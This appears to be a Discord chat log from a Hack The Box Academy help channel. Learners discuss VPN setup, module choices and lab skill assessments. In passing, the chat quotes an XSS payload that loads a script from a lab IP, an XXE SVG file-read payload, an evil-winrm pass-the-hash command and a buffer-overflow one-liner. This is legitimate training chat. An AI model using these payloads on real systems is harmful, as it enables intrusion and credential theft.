(note you only need to download the academy vpn once unless you change region)
oh yes thanks..
Indeed, I downloaded it via this page https://academy.hackthebox.com/vpn
then ran: sudo openvpn academy-regular.ovpn
on my kali but it ended with an error
it could be the ipv6 error that some people have had for some reason
yes "Linux can't add IPv6 to interface tun1"
Okay let me try this.
btw I'm using expressvpn , that shouldn't cause any trouble right ?
or should I better deactivate it ?
that's irrelevant
it's literally a case of ipv6 being disabled
which is what switching that /proc/ file from 1 to 0 fixes
Okay, when downloading the vpn connection file,
should I select udp or tcp ?
or it doesn't matter ?
tcp is more stable
to add on that, it's usually better to have VPN using UDP, however in the case of hacking and because you will likely do scanning and other nasty stuff, having a reliable underlay connection is better. In real life, that comes with a trade-off in performance
yep; especially since you do a fair bit of RDP to windows machines
even without switching regions: people have reported increased performance switching from udp -> tcp
Okay udp was selected by default and I first downloaded using it
I was getting some strange failing connection messages.
I use tcp file now, and it is working like a charm, thanks
One last question please
I don't quite understand, what is happening,
so I'm now connected to the academy server right?
Why do I need this actually?
it is in combination with this "and any section that requires the vpn will have a download for it" ?
so when a section requires a vpn I will get a new ovpn file to download ?
it's a vpn connection, allows to access HTB lab machines which are not accessible on public internet
you don't need to download a new one every time
labs are hosted in the internal network of HTB , vpn puts you inside their network so you can use the labs
it's just there to let you know, just in case, that you'll be interacting with a private network
So now I'm in the HTB internal network right ?
after successfully running: sudo openvpn academy-regular.ovpn
yep if you do ip a you should see a tun0 that has an ip such as 10.10.x.x
maybe intro to networking will be very helpful for you
then tun1 is the interface you'll use whenever "tun0" is referenced
welcome to the club
also paid vpn services are meh
if someone really wants to they'll just go through it anyway
trust issues ^^
false sense of security ¯\_(ツ)_/¯
Hey, can I dm someone about Advanced Deserialization Attacks module? Can't make my Json.Net payload work
only time i'd really feel the need to use a vpn is if i'm attacking an online target
not really, some countries have restrictions over some services, so ppl use VPN to bypass it
true
my example was more personal
ik in some countries anything to do with "hacking" is blocked by isps ¯\_(ツ)_/¯
for browsing the web in general , a vpn is also recommended or not ?
not really
cookies are what store your browsing data, not really your ip (some of it is tied to it via geo stuff) but in general all of your data is stored in cookies
You can't trust the VPN providers xD
if you're browsing to a sussy website; then Yes - for sure - use a vpn as a just in case but at the same time. WHY ARE YOU VISITING SUS WEBSITES
haha 😄
Allright guys, thanks a lot
I'm looking at the HTB VIP features.
Currently I'm pursuing the pentest path.
Will the vip subscription be relevant to this path ?
What are these "Retired Machines" for example ?
Retired machines are on the main website
they are machines that have writeups available
and do not count towards any rank progress on the main site
but it's not really needed to learn ¯\_(ツ)_/¯
you can practice enumeration and techniques on active boxes
retired machines , come with writeups so ppl use them to learn
active machines are more like competition you can play them to sharpen ur skills and get a better rank
but those are in the main platform
you'd need to link your https://app.hackthebox.com/ account to the discord to access more of the server btw (read #welcome )
I think I don't have a https://app.hackthebox.com/ account.
This is a different account from the academy right ?
Can I just create one or is it for VIP member ?
no , you can create it , there's a lot of free stuff
Okay thanks
Okay I have created an account
there is lot of material there also
That and the academy is maybe too much for me at the same time 😀
I will continue with the academy first
or do you guys recommend another way ?
whatever works for you
some people learn better without a structure
and just google their way through the solution and learning
hi, im stuck in the last part of hacking wp skill assessment (obtain a shell). I would like to know if i can obtain it through the LFI that i already h or need to look for other things. Thx (DONE)
Ah yeah that's right !
I like structure. The academy is great. Well organised and step by step
the labs are a sort of blackbox almost
you just get an IP to scan and a prayer you can figure it out
Marcie, could I get your help again please? (You're gonna hate me soon!)
I'm trying to use msfconsole to exploit a plugin. Although every time I run it, I keep getting this error
[*] Started reverse TCP handler on 10.10.15.61:4444
[-] Exploit aborted due to failure: not-found: Failed to retrieve generator
[*] Exploit completed, but no session was created.
I'm assuming my TARGETURI is incorrect? I've changed it to the root of where the || theme || is, and then tried to direct the exploit at the ||template.php|| file too, but no luck.
Reading on ||https://nvd.nist.gov/vuln/detail/CVE-2019-11231|| I don't seem to have a ||theme-edit.php file|| although I have found the ||API Key, but assuming that's to assist with getting Admin access?||
Okay thanks again guys. That was it for me today.
See you tomorrow
oh, so just set the RHOSTS and away I go?
and LHOST to your ip
protip: don't change parameters unless you for-sure know what it does
Noted! Live and learn as they say
i ran sharphound on the computer and transferred the file on my attacking machine
i did managed to get the ms01$ admin hash
now i got a better terminal
and now i got the CT user and hash as well
big progress big time
Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" .exe
Do I need to add this into a file in order to use this? Or Do i do the sudo command?
A little confused on what I need to do here.
Nevermind, I got it!
Copy paste second line, hit enter
Thank you though
Hey Guys , pulling my hair out a little here, Im doing the 'ZAP Fuzzer' part of 'Using Web proxies', i've had no issue setting up the fuzzer with the sec list and the processor to get the MD5 hashes and making the requests however the response is not the cookie which I have set in the request, it is the default cookie , I have tried with both GET & POST , any ideas?
Can anyone help me complete the skill assessment of attacking the authentication mechanism? I have obtained the key correctly and also modified the jwt, but I cannot obtain the flag correctly whether I use it in /register or /login. This is the url: https://academy.hackthebox.com/module/170/section/1677
That's what i did as well...
And is it not working
exactly 😄
@umbral fulcrum @fathom pendant I did test double pivot with 2 ligolo instances and 2 tunnels and put it here because I believe it can be useful to others. Didn't really like having to switch back & forth, with this approach you can keep both pivots https://www.notion.so/Double-Pivot-with-ligolo-ng-c63a1261f9cb47979f4eceba42eb108c
I would be interested to read it but I need an account 
you can log with your google account if any
but I can also unicast to you if you want
If it’s not too much trouble I would like as well please
Why?
https://www.kali.org/tools/bloodhound/
Is it correctly installed?
no I meant, I was able to extract the data, however SQL01 had no user sessions, and no path was found by BH
I collected the data via local admin on SQL01
Try it on another computer then
I managed to complete the lab, but might try again someday 🙂
thx
AD Enumeration & Attacks - Skills Assessment Part I
Last question: Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01
I completed it using ||impacket psexec and pth attack||, but was there any other ways to do it? If you know other methods just dm me
You can also use winrm, but it's doing kind of the same evil-winrm -i 172.16.6.3 -u administrator -H 27dedxxxx
You can see the decrypted text in the debugger after the function (in the final question) is executed, since it needs to load the string it wants to encrypt into a stack (Idk if it is called a stack)
Oh, so it wouldn't be on the text file? It would be in the debugger?
Were you able to find it?
Would you mind sending me some screenshots? I'm not sure where that variable would be located with the string on x64dbg... I played around quite a bit when I first did this module
Hello
I have a problem this exercice : Cross-Site Scripting (XSS) Session Hijacking
I send my XSS and I listen with my php
<script src=http://10.10.14.220:3333></script>
wrong payload btw
I don't understand, misplaced? because I tested all the fields ^^"
Hi I understood that the $ in ||dc01$|| is a separator and neither john nor hashcat can work with it. Do You have any tips that could make this $ count in the hash ?
trying not to give away this answer but i def got this right and HTB is telling me im wrong...
AD Enumeration & Attacks - Skills Assessment Part II. Any idea where to go in this step? Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I can get to that sql server with impacket tools and even get a reverse shell, but I don't have many privs. SeImpersonatePrivilege is enabled, is that viable way, dont really know anything about how to abuse that yet.
Google the privilege 🤷🏼‍♂️
Fairly sure it’s been discussed in the ad module
Look through some of the common exploits in that module, it's discussed there
what does the hint say
what a asked so i11egal
okay, that took a while but it was fun and very great content. thanks to the creator
Doing the file transfer module and I've uploaded the upload_win.zip to the windows machine but I can't extract it to do the hasher command. It always gives me an invalid archive error. I did find an already extracted file and its hasher value gives an error. Any idea what's wrong?
yes, but it also said to use PORT instead of the actual port
Ugh.... really
I get everything else right and that's the stupid mistake I made lol
I'm currently working on the DOM-based XSS portion of the XSS module, specifically targeting the TO-DO website. In the write-up, it mentions, "If we try the XSS payload we have been using previously, we will see that it will not execute. This is because the innerHTML function does not allow the use of the <script> tags within it as a security feature."
I'm curious about the security feature mentioned. I can't find any mention of a security feature from innerHTML that prevents running a <script></script>.
In the script.js that the TO-DO website uses, it doesn't employ any input encoding; however, it does use URL decoding.
Could someone help me understand why you CANNOT run a <script>?
Thanks in advance.
I know we are supposed to use another XSS payload, however im only curious
https://www.w3.org/TR/2008/WD-html5-20080610/dom.html#innerhtml0
its part of the specifications
script elements inserted using innerHTML do not execute when they are inserted.
Hey, so i am doing the module about ACLs and i have a question that says: What is the ObjectAceType of the first right that the forend user has over the GPO Management group?
I am trying to do this in bloodhound to get to know it a little better. But i cant seem to find a way to see permissions over groups? Is there a way to do this in bloodhound?
bloodhound calls the permissions different things than powershell does sometimes
my settings are first node: forend user then the end node of the GPO Management group
but youd go to forend and then select the outbound permissions thingy (idr its exact wording)
yeah i couldnt find it. Trying to see if its easier to do this in powershell
or PowerViewer
thanks
np
not the place for general questions, verify your account with the instructions in #welcome and then you can ask in better channels
some server down again? machines spawn but give no IP
there was some hiccup
Definitely easier. It just requires patience with the command that lists user rights with SID. It takes a few minutes
@here please i am new to using hackthebox and need help with understanding how Kibana works for the SOC analyst role. @dpgg
Hi all. Im currently working through the final question of the nmap module, the firewall and IDS IPS evasion hard lab. Can I pick someone's brain to check if I'm on the right lines?
@here is blocked for pleb users.
Source-port is gonna be a main source of your woes
The other is gonna be a Syn
Yeah it was def easier. I think i need to read the acl article a few more times just to understand it a bit better. I understand that its a way to limit user action based on domain permissions and groups but thats all i’ve understood so far
At least all i can remember now
I mean, that's basically it. Just sometimes, some users are a bit more special than others
Bloodhound was def good to elevate privileges tho. Understanding the exploit chain better
Also it was neat to have that help option to see examples of ways to exploit. Like applyself or genericall etc
I'm gonna assume trying UDP ports is the wrong line of thought then
But what confused me a little is that: is a user a part of a group or a group a part of a user. Or i guess it can be both but yeah
A syn scan of all ports with the right source-port will reveal a lot
So can I only use socks5 with port 1080?
I tried using 7000 but it was not working
I changed the proxy for socks5 in proxychains.conf
socks5 127.0.0.1 7000
It is not working
because there’s no proxy server that supports socks5 listening on that port
So the sock values have to be constant during tunneling?
Hello, I was working on solving the Footprint Lab - Hard machine. I connected to the machine via SSH and then discovered MySQL inside the machine. I connected to it, but couldn't find anything. Do you have any suggestions? Where else can I look? I thought I had checked everything thoroughly, but I seem to have missed something.
Like 9050 for socks4 and 1080 for socks5?
You need to look at it as admin
Oh wait mysql on hard
comeon, I'm still not getting any IPs, am I alone?
whatever version set up on the proxy server
should be in your config file also
oh now works
I edited the proxychains file and used --socks5 on chisel server
yeap I've already searched extensively, but couldn't find any information. I wonder if I need to escalate privileges. I've checked everywhere inside the database.
Then you found a second user, yes?
Maybe switching your perspective will help
Is there any way to change the socks ports? Just asking for curiosity
yeap 3 user but we have 1 user
If I recall, one of the databases you can view has creds
I tried asking gpt it said it will work I think I gotta look for into it
Thanks guys for the help
And if you check the /home/ directory then you'll see what I mean
ChatGPT is a crock of shit lol
Yea but good for asking simple stuff
oky im searching
look into the help page of chisel and see what proxy types it supports and how to configure it
Ok
and bum footprint module finish 🙂
ez
The brick wall had a door right next to where you were stuck huh.
Footprinting module is one of my favs
😦
Lots of enumeration
i like this module
It helps reinforce the enumeration methodology
Yea learned a ton in there
thx for helping @fathom pendant
My fave skill labs are the password attack ones, specifically the hard one, bouncing back and forth
Showcasing the step-by-step break-in
Active directory rooms interest me.
Im doing the pw attack rn, right now i dont enjoy it :/
Some of the sections are meh, bc of the waiting
My biggest thing is the question with Will. But that's just bc it adds an extra layer of "wait who tf is ||kira||"
Yeah had to brute for 20 minutes on the mutations
I dont get it
dont call em rooms or youll get bullied 💀
Poked with a stick
I was resisting the urge
Got it, I'll be careful.
Credential Hunting with Linux section
Without the hint you're kinda just stuck for a bit
Ah got it
Im being tongue in cheek, but its a THM specific lingo and THM is generally looked on...poorly lol
Aside from throwing both wordlists at it ofc
Top 1%
hahaha I'm trying to learn too
yess thm is a similar game
ok so I did what you said using the only logical source port, now i found another port that could be of interest, but using -sSV, or -A flags doesnt return any version results. Should i use a script?
Sorry if im asking too much but I am hitting a wall here and I dont know how many more times i can read over my notes ha
-sS and -p-
Sometimes you need to manually connect to a port
Nmap isn't always gonna give the answer
I guess the port I found isnt the one then, cos i tried to connect to the port I thought was the interesting one and got permission denied
You need to connect with a source port too
yeah I did the -sS flag but looks like i forgot a -p- so ill add that
yeah i tried with the source port and got the same thing, so must be the wrong port i think
Maybe
It's a high port number fwiw
The ids/ips evasion section regarding proxying will be more helpful
yeah it is a pretty high port number. more than 4 digits, but ill do more digging, thanks for the tips
While it refers to a specific port, the method works to check all
That should be the port then
Sounds like the dns and nmap evasion part, was pretty fun
Hey guys, sorry I'm new here, can any one explain how we can identify the number of transfer zones?
module: INFORMATION GATHERING - WEB EDITION
nope nobody has ever completed the module
Liar 🤥
Localhost
Dig axfr
axfr
I think the issue was i didnt sudo when i manually connected LOL
I already ran it, but from the output perspective, which lines guide to the zones?
Yeah the source-port is a bound port so sudo is needed
I just did it and it worked, feel so dumb hahaha
that explains the permission denied
thanks a lot for your help ha
Anyone unable to login to the windows server with htb provided credentials? This is for Guided Lab Part 1 under Introduction to Active Directory module
???
im so new at this i cant even find bash in the tutorial
'Password'
$
The word you're looking for is "terminal"
there’re a few of them here
whats up?
hello
i just registered to htbox and i have 0-1 spawns left so i can continue, when will it refill?
Tomorrow
I'm having issues with the file upload assessment
Hi, I'm working on the Exploiting Web Vulnerabilities in Thick-Client Applications. It seems like there isn't any solution. When I change the port number in beans.xml and recompile that way, the connect button doesn't change any requests.
If I also delete all the entries in META-INF/MANIFEST, as instructed in the section, and then recompile, I get a JNI error for some reason.
Any suggestions?
im new to this im looking for someone to coach me or to guide me, is there anyone?
idk what im looking for this is what its asking me
"Click the Start Instance button
Try to locate the bash terminal icon and click it"
Free users on academy get one pwnbox spawn per day
not unless you sub
No one is gonna coach you privately
can i ask a lot of questions here?
the green button that says start instance on the page
when i upload the .jpg file it works but when i create the shell.svg file it doesn't load at all and i remove the file type and permissions in the dev console
If it's related to academy modules, yes. But be sure you can't Google the answer first
you can but doesnt mean theyl be answered
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>
```
i pressed start instance but i cant find where the icon is after that
thats the payload i use
i have general questions because there are many courses and i consider subscribe
Start instance isn't the same as spawn target
i followed 3 youtube videos in a series to learn linux, of "network chuck"
are you using burp?
i have no idea what spawn target is
Getting Started is a good module to teach you how academy works
But on the page, if there's an interactive target, there's green text that says "Click here to spawn target"
It won't be in the instance window
thank you ill start with this
The instance window is just HTB's in-browser vm, Pwnbox
Whenever you see pwnbox, it's referring to that vm
Yessir I’m trying to upload that payload and intercept with burp but when I try to upload the .svg file it doesn’t upload
thank you i will start this course now. can i ask please what are the best modules to learn to find a job?
There's none that will guarantee you a job
i want to learn how to hack
That's very broad
There's web hacking aka bounty hunting, and domain hacking, generally red teaming
This is very hostile dude
this made me giggle
i am just asking man
Still comes off as edgy and rude
you’re on the right track
not everyone has seen the same movies as you to get it ¯_(ツ)_/¯
you guys learned a lot of modules from the htbox?
I figure but that not the first .svg payload I tried and nothing I’m doing is working
and movies too
Modules, prior knowledge, using critical thinking
can you give me tips on what to do if i just started to make my learning process efficient
that payload
Take notes

Not working for me on Parrot 🦜 OS or Kali
I don't know anything, just some basic commands from some videos, and I wrote them in a text file on my desktop as "commands I learned"
buy a hoodie
Use obsidian
works in burp
It's a great note taking tool
type it out and make sure not to copy and paste
very motivating
We are in the same boat, my man. It is going to be a long road. I've done a few modules of the pentester pathway now and it's pretty good. The job role pathways seem to be good for what you are looking for, as they are tailored to getting those specific job titles from what I understand. But I am new to the platform as well.
Tryhackme is very basic but I don't think they really reinforce basics
Very hand holding though
will do
thanks for this. So do you recommend subscribing and purchasing modules? Do you think if I learn all the modules I'll be insane?
Htb active labs are free
Yeah I came from tryhackme, and tbh I enjoyed it but I have had a better time with the content here. Having the boxes on HTB platform to reinforce the learning also seems really useful
Also
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Starting-point is also free
And guided mode, which is the 2(?) most recently retired machines
someone?
I think they make the point that you'll be intermediate if you finish the pathway. I have paid, but I understand that you don't have to. If you are serious about it, try a module and if you like it then go for it. Getting any other cert like OSCP, for instance, is way more money.
Follow the "Fatty" walkthrough
alright, I'll do some tier 0 modules and see how things are going, is that good?
So don't follow any of the instructions of the section, import the jar and use its functions? LOL
someone correct me if I'm wrong though. But yeah, hacking is a massive field, so you should probably always stick to the "I am always learning" philosophy
Anyone wanna help me out? I'm on the skills assessment for Shells and Payloads and stuck on the last flag. I've tried everything. I think it's a problem with the box. I hate using EternalBlue and Metasploit. Only seems to work when it wants to.
Yep tier0 modules are "free" as in they will give you the cubes back when you complete it
Are you using the right Lhost?
thanks, okay, I'll go learn some modules and I'll probably be back with more questions. Thank you guys
I've tried both the RDP IP and the IP of ens224
Bingo. Start with what interests you first, then expand
172.x.x.x yeah?
of the modules I've done so far I'd probably recommend "Getting Started". It's kind of holistic in the way it walks you through each part of a test and exploiting a machine. Pretty good for dipping your toe in.
I dont recall having any issues with the exploit
thanks
yea
it worked on mine ¯\_(ツ)_/¯
same
Which one are you trying?
Even when I tried his way, I still had to import the jar file as an external library, and because I want to change the connection information, I still face the same errors when recompiling the jar file with the updated port in beans.xml.
Anyone run into this error before? Can't seem to figure out the issue. Installed a new version of OpenSSL too, just in case.
For INFORMATION GATHERING - WEB EDITION, Active Infrastructure Identification
Can anyone help explain the:
vHosts needed for these questions:
app.inlanefreight.local
dev.inlanefreight.local
I don't really understand how adding these changes what my whatweb results are
For context, I did some research and saw that I had to add these to the /etc/hosts file. I was just looking for a further understanding, since for the pentesting path this is the first time that I have done something like this.
they're not publicly available domains, so by adding those entries to your hosts file you're mapping the domains directly to the IP, eliminating DNS resolution
Okay okay, thank you for the explanation, really. Now would I just map them to the target IP that I was given for that section then?
yes
ip domain1 domain2
How does that work with them both being tied to the same IP? I am just trying to fully understand
When I ran whatweb for app.inlanefreight.local it ran, but then when I ran the command again for the dev version it never finished
they're vhosts, it's an easy way to host multiple domains on 1 IP address
strange
Yeah, that was my main point of confusion after I had added both of those domains to the hosts file. Since one ran and the other didn't, I thought that I had incorrectly added data into the file, and I also failed to fully understand the whole adding-vhosts idea and those domains
I am still trying to wrap my head around the whole idea of how domains and subdomains work, it has always been a big point of confusion for me
I've gotten that error before, don't remember what I did to fix it. Did you google the error?
yeah, and tried the fix but it didn't work... I may just go back to using Kali... plus OffSec doesn't support it and I may need to take that for work at some point (OSCP), so I'll just go back. Wanted to try something new
I hear you. I use Kali... agree with using it for the OSCP
yeah just may be better all around
hey, I'm currently stuck on a box in HTB called DevVortex. I want to ask for help, can I do it here? I already tried the forum but it was not much help
no you cannot do it here
read #welcome
okay, is there a community where I can ask for help?
read #welcome
Can anyone help me understand, when I am using dig, how can I tell which zones I can transfer? Or do I have to manually try each and every one?
Try just reinstalling it
I said this earlier: localhost
in the results of axfr inlanefreight.htb @xx.xxx.xxx.xxx I don't see that
What ip relates to localhost
It's across any network regardless of type
okay I see now
I can transfer to one but not the other, even though they both relate to localhost
Nameserver won't be able to be transferred
Okay okay, this is really helping me understand now!!
But you should have enough info with what's available to answer it
I just was having trouble understanding which zones I can transfer to, now I am getting the hang of it thank you!
okie dokie... I can remove and reinstall
Active Directory Bleeding Edge Vulnerabilities section: Unable to git clone.
does anyone know how to adjust VirtualBox VM screen resolution?
It's so big for me, I tried to change it in Settings -> Display -> Scale Factor but it doesn't do anything at all
is there any reason why a Windows 10 VM works on a Windows 11 host?
Did you forget that the labs have no internet access?
Same underlying structure
not secureauthcorp anymore, it's Fortra
Also that
ah yeah, lab machine too
Ye as soon as I saw htb-student I was like "lab machine"
Got it, it was in the /opt/ folder
I am having an issue with this though, it won't read the flag
Even with a full path
how do I access "+ 0 Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio." in Password Attacks, Linux
why would DCSync give you the flag?
because that's not where the flag is, reading the question helps sometimes
I've tried the type command, but it says the file could not be found.
read the question
What is the point of DCSync? I thought I would at least be able to get a shell.
Why does this get me to the EIP
r python -c 'import sys; sys.stdout.buffer.write(b"\x55" * 2060 + b"\x66" * 4)'
But this doesn't??
r python -c 'import sys; sys.stdout.buffer.write(b"\x55" * (2064 - 4) + b"\x66" * 4)'
Am i going crazy lol
you can ask to DM someone in #boxes
So I used the 'aad3b435b51404eeaad3b435b51404ee' portion of the hash
and hashcat exhausted
The nt is generally what's used to pass around
pass around
and the LM hash is a blank hash, there's no point trying to crack that
think of the different things a hash can be used for
Ok, so I took a step back and went to "Getting Started" and am under the Basic Tools module. I really want to understand why I can't get the bonus question. I have the target IP and have tried netcat but still can't seem to banner grab the target. Am I supposed to try and get a hostname first?
I don't think I've got to the pass the hash section yet
oh basic tools
I'm kind of aware of how it works.
Yes Basic tools haha.
Basic Tools is the name of the section btw, not the module
Modules are divided into sections
Netcat is the way to go
You're given an ip:port
The syntax is
nc ip port
The syntax is shown in the section btw
Don't see that syntax and it's still not working. I used nc (the target IP) then port 22 and still nothing.
Why 22? You're given a port
the syntax given is
netcat ip port
so confused, lol, because the example uses netcat and port 22
Yes. That's an example
hi guys, Kali Linux won't show me the login, it just starts up and goes blank. How to fix?
But the device you're given is giving you an explicit port
Better to ask in #1024429874246590575 my dude
The optional exercise gives you an ip and port
the Target IP that generates when I click it? That includes a port?
........ah
I said this earlier
This
Just worked!!! Sorry. Sometimes I can't tell if "ip:port" is an example of a command or the format in which some information is being given.
In general it'll be information given